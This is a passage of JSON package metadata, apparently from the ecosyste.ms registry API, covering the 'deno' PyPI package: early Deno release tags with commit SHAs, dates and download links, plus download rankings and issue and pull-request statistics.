d":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-09-08T17:32:47.669Z","dependent_packages_count":0,"downloads":174935,"downloads_period":"last-month","dependent_repos_count":3,"rankings":{"downloads":25.812529619494594,"dependent_repos_count":8.976891510839746,"dependent_packages_count":10.05962490376147,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":14.949682011365269},"purl":"pkg:pypi/deno","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/pypi/deno","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/pypi/deno","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/pypi/deno/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-09-08T15:20:51.828Z","issues_count":6662,"pull_requests_count":9678,"avg_time_to_close_issue":17121605.73139413,"avg_time_to_close_pull_request":1530875.9301115242,"issues_closed_count":3814,"pull_requests_closed_count":8069,"pull_request_authors_count":594,"issue_authors_count":2496,"avg_comments_per_issue":2.5022515761032724,"avg_comments_per_pull_request":0.7209134118619549,"merged_pull_requests_count":7045,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":682,"past_year_pull_requests_count":1198,"past_year_avg_time_to_close_issue":1327952.9787234042,"past_year_avg_time_to_close_pull_request":1317968.8908554572,"past_year_issues_closed_count":235,"past_year_pull_requests_closed_count":678,"past_year_pull_request_authors_count":194,"past_year_issue_authors_count":379,"past_year_avg_comments_per_issue":1.2272727272727273,"past_year_avg_comments_per_pull_request":1.1327212020033388,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":2,"past_year_merged_pull_requests_count":509,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1808,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1731,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":925,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms